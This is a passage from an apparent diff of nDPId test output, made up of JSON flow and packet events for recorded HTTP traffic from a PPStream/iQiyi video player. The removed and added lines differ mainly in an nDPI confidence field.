{"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:2:1|2&av=4.10.004&b=204076701&c=6&ct=5000000926795&d=158&di=&dp=71000001&e=512ab77de7f67d49f24d3511778220d0&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000856344&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353139057&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=500494600&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1467353140677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353140677,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0b19AADMGyurKbA7dwKhzCABQxSpsAhW90liKZlAYABAfBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7580000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1467353140709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":944,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":944,"pkt_l4_len":910,"thread_ts_msec":1467353140709,"pkt":"TF4M6gNlABxCjnAxCABFAAOiA\/BAAIAG5m3AqHMIymwO28UpAFCvhj83b730NFAYAQRULwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0xMTcmdG0zMT0wJnRtMzI9NDcmdG0zMz03OCZ0bTM0PTEmdG00PTEzNyZ0bTQxPTAmdG00Mj0xNiZ0bTQzPTEyNSZ0bTQ0PTImdG01PTE2NSZ0bTUxPTAmdG01Mj0wJnRtNTM9MCZ0bTU0PTEwJnRtNj0mdG02Mj0wJnRtNjM9MCZ0bTc9MCZ0bTcxPTAmdG03Mj0wJnRtNzM9MCZ0bTg9MCZ0bTgxPTAmdG04Mj0wJnRtODM9MCZ0bTk9OTE2JnRtOTI9MTYmdG05Mz02MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZyYT0yJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xD
QpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01470{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7580000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=117&tm31=0&tm32=47&tm33=78&tm34=1&tm4=137&tm41=0&tm42=16&tm43=125&tm44=2&tm5=165&tm51=0&tm52=0&tm53=0&tm54=10&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=916&tm92=16&tm93=62&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=2&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
+01470{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7580000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=117&tm31=0&tm32=47&tm33=78&tm34=1&tm4=137&tm41=0&tm42=16&tm43=125&tm44=2&tm5=165&tm51=0&tm52=0&tm53=0&tm54=10&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=916&tm92=16&tm93=62&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=2&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1467353140720,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140720,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5F1lAADMGIt3KbA7swKhzCABQxSvXmoUy4BpnKlAYACB7oAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7580000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1467353140755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":656,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":656,"pkt_l4_len":622,"thread_ts_msec":1467353140755,"pkt":"TF4M6gNlABxCjnAxCABFAAKCA\/NAAIAGOsjAqHMIZeMgJ8UsAFDdytkdPM+rpVAY\/\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"} 
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7580000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"cache.video.iqiyi.com","url":"cache.video.iqiyi.com\/vi\/500494600\/562e26caed5695900212eb3259070f8a\/?src=1_11_114","code":0,"content_type":"","user_agent":""}} +00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7580000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"cache.video.iqiyi.com","url":"cache.video.iqiyi.com\/vi\/500494600\/562e26caed5695900212eb3259070f8a\/?src=1_11_114","code":0,"content_type":"","user_agent":""}} 
01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1467353140794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"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\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwicHR1cmwiOiIiLCJzdGFydFRpbWUiOi0xLCJzdCI6MjAwLCJ0eSI6MjAxNjA2MjUsInNtIjowLCJzaG93Q2hhbm5lbElkIjo2LCJwb3Z1IjoiIiwicHJvZHVjZXJzIjoiIiwiZXRtIjoiIiwic3VwTmFtZSI6IiIsInR2RW5hbWUiOiIiLCJzYyI6MCwiY2MiOjAsIm1kb3duIjowLCJwYW5vIjp7InR5cGUiOjF9LCJtYWluQWN0b3JSb2xlcyI6W10sInN1YktleSI6IjIwNDA3NjcwMSIsImFwaWMiOiJodHRwOlwvXC9waWM1LnFpeWlwaWMuY29tXC9pbWFnZVwvMjAxNjA2MjVcL2Q3XC81OVwvdl8xMTA1ODM2NjZfbV82MDEuanBnIiwiZXMiOjEsInByb2R1Y2VyIjoiIiwiZW5kVGltZSI6LTEsImF1IjoiaHR0cDpcL1wvd3d3LmlxaXlpLmNvbVwvdl8xOXJybGpmM2hnLmh0bWwiLCJjaXJjbGUiOnsidHlwZSI6MiwiaWQiOjIwNQ=="} 01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1467353140794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"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\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"} 
00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1467353140888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140888,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5fz1AADMGuwnKbA7bwKhzCABQxSlvvfQ0r4ZCsVAYADyHfQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01200{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1467353141138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1467353141138,"pkt":"TF4M6gNlABxCjnAxCABFAAJYBBhAAIAG54\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"} 
-01140{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01140{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1021,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1467353141308,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353141308,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uEFAADMGggXKbA7bwKhzCABQxS1wKzTY7Tl5ilAYADfR4AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1467353142534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353142534,"pkt":"TF4M6gNlABxCjnAxCABFAAOkBEBAAIAG5grAqHMIymwO7MUnAFCB65f\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"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353144633,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1467353144633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1467353144633,"pkt":"ABxCjnAxTF4M6gNlCABFAAFNZb1AADAG6WZ1T1GHwKhzCABQxQsUvd5l87WhOFAYAA4qLgAASFRUUC8xLjEgMzAyIEZvdW5kDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjMzIEdNVA0KQ29udGVudC1MZW5ndGg6IDANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClNldC1Db29raWU6IFY9NjY5Mzg1MTYxNTg4NTA0OTAxMTsgRG9tYWluPW1sdDAxLmNvbTsgRXhwaXJlcz1TYXQsIDAxLUp1bC0yMDE3IDA2OjA1OjM3IEdNVDsgUGF0aD0vDQpMb2NhdGlvbjogaHR0cDovL2NtYy50YW54LmNvbS9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MQ0KDQo="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353144633,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353144633,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7580000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1467353144819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":444,"pkt_l4_len":410,"thread_ts_msec":1467353144819,"pkt":"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"} 
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7580000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cmc.tanx.com","url":"cmc.tanx.com\/andc?andc_uid=6693851615885049011&andc_ver=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} +00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7580000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cmc.tanx.com","url":"cmc.tanx.com\/andc?andc_uid=6693851615885049011&andc_ver=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1467353144913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1467353144913,"pkt":"ABxCjnAxTF4M6gNlCABFAAENPiNAACwGXAmMzfNAwKhzCABQxTJRex+WQrUJ5lAYFg2SoAAASFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBjbG9zZQ0KU2VydmVyOiBUZW5naW5lDQpUaW1pbmctQWxsb3ctT3JpZ2luOiAqDQoNCjMxDQpHSUY4OWEBAAEAkQAAAAAA\/\/\/\/\/\/\/\/AAAAIfkEAQAAAgAsAAAAAAEAAQAAAgJUAQA7DQowDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7580000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00935{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1467353147705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1467353147705,"pkt":"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"} 
